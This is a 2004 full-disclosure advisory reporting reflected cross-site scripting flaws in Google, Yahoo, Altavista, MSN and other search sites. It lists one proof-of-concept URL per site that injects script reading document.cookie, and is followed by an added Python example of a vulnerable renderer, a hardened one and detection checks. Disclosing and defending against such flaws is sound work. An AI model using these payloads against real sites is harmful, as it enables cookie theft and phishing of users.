Message-ID: <001501c472bd$4d2d8230$6501a8c0@sec>
From: me at cipher.org.uk (E.Kellinis)
Subject: Cross Site Scripting (XSS) on Google, Altavista ,Excite.com,Yahoo etc
#########################################
Service: Search Engines
Vendors: Google,Altavista ,Excite.com,Yahoo
Metacrawler, Dogpile, Downloads.com, MSN.com
Bug: Cross Site Scripting
Risk: Medium or Low or High, depends on your point of view
Exploitation: Remote
Date: 22 July 2004
Author: Emmanouel Kellinis
e-mail: me@...her(dot)org(dot)uk
web: http://www[dot]cipher[dot]org[dot]uk
List: BugTraq(SecurityFocus)/Full-Disclosure
#########################################
Sometimes Mozilla, IE or Opera are not the main concern for
XSS attacks but websites themselves.
There is an XSS vulnerability in all the major search engines,
and not only, web sites. To be honest the following is a very
small list of the "funny" XSS vulnerabilities that people don't
pay the needed attention to. The XSS vuln is inherited by anyone who is
using these search engines; often there is no need to try and find
a flaw in their web service directly, but you can have the same
result with indirect digging.
In the following list the most usual approach is JavaScript
poisoning inside the <title> tag. Search engines (and not only)
tend to do input/output validation on the searched keyword
only inside <body> and not before, so there you go,
you just have to do </title> and write your stuff, or
sometimes not even that.
Also you will notice that BIG websites do not pay the needed
attention to other pages inside their domain except the main.
So if you can find an XSS somewhere else you can still get
the client's cookie (or phish him or her), which is never a good thing!
Most of the following search engines are already informed about
the problem; the ones that I didn't inform was because I couldn't
find their contact details. Some of the following links may not work
but most of them will.
Google.com
http://googlesite.google.com/search?output=googleabout&site=googlesite&q=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

Metacrawler.com
http://www.metacrawler.com/info.metac/search/web/%253C%252Ftitle%253E%253Cbody%2Bbgcolor%253D%2522blue%2522%253E%253Cscript%253Ealert(document.cookie)%253B%253C%252Fscript%253E%253C%252Fbody%253E

Excite.com
http://msxml.excite.com/info.xcite/search/web/%25253C%25252Ftitle%25253E%25253Cbody%252Bbgcolor%25253D%252522blue%252522%25253E%25253Cscript%25253Ealert%252528document.cookie%252529%25253B%25253C%25252Fscript%25253E%25253C%25252Fbody%25253E

Downloads.com
http://www.download.com/3120-20-0.html?qt=%3C%2Ftitle%3E%3Cbody+bgcolor%3D%22blue%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%2Fbody%3E&tg=dl-2001

DogPile.com
http://www.dogpile.com/info.dogpl/search/web/%253C%252Ftitle%253E%253Cbody%2Bbgcolor%253D%2522blue%2522%253E%253Cscript%253Ealert(document.cookie)%253B%253C%252Fscript%253E%253C%252Fbody%253E

Altavista.com
http://www.altavista.com/web/results?q=</title><body%20bgcolor="blue"><script>alert(document.cookie);</script></body>

Yahoo.com
http://us.rd.yahoo.com/reg/sc/nav/*http://www.%20<script>alert(document.cookie);</script>

MSN.com [fast response/fixed]
http://local.msn.com/results.asp?ec=&zip=</script><script>alert(document.cookie);</script><script>
and for the sake of it securityfocus.com [fast response/fixed]:
http://www.securityfocus.com/cgi-bin/sfonline/jobs/search_jobs.pl?keyword="%20onfocus="alert(document.cookie);"
/\Side note/\
I would, and not only I, appreciate a list of Security Contact details
of at least the Fortune 500 companies.
(Sometimes it is so frustrating to find their security contacts inside
their ten billion lines website that you don't even bother!)
=========================================================
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=========================================================
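Added example, not from the post or from any of the vendors named in it: a minimal search-results renderer in Python showing the defect the post describes (the query is escaped only inside <body>, so "</title>..." breaks out of the title, and the SecurityFocus-style payload breaks out of an attribute) next to a context-aware version that escapes the query everywhere it is reflected. The function names and the page template are hypothetical; `html.escape` is the standard-library escaper.

```python
# Added example (not the original post's code). Demonstrates why escaping
# the query only in <body> is not enough, and what the fix looks like.
from html import escape
from urllib.parse import unquote

# Constructed sample queries, the same shape as the payloads in the post:
# one that closes <title>, one that closes an attribute value.
SAMPLE_QUERY = unquote(
    "%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
)
ATTR_QUERY = '" onfocus="alert(document.cookie);"'


def render_vulnerable(query: str) -> str:
    """Hypothetical buggy renderer: the query is escaped in the result
    paragraph only, but reflected raw into <title> and an attribute."""
    return (
        f"<html><head><title>Search: {query}</title></head>"
        f'<body><input name="q" value="{query}">'
        f"<p>Results for {escape(query)}</p></body></html>"
    )


def render_hardened(query: str) -> str:
    """Fixed renderer: escape once, before the query reaches any HTML
    context. quote=True also encodes quotes, which the attribute needs."""
    safe = escape(query, quote=True)
    return (
        f"<html><head><title>Search: {safe}</title></head>"
        f'<body><input name="q" value="{safe}">'
        f"<p>Results for {safe}</p></body></html>"
    )


def title_is_closed_early(page: str) -> bool:
    """Defensive check for the bug class in the post: a correctly built
    page contains exactly one '</title>', the renderer's own."""
    return page.count("</title>") != 1


def reflected_unescaped(page: str, query: str) -> bool:
    """True if the raw query appears verbatim in the output, i.e. it was
    reflected without escaping in at least one context."""
    return query in page
```

Running `title_is_closed_early` and `reflected_unescaped` over a page's own responses to a handful of constructed queries is a cheap regression check for this bug class.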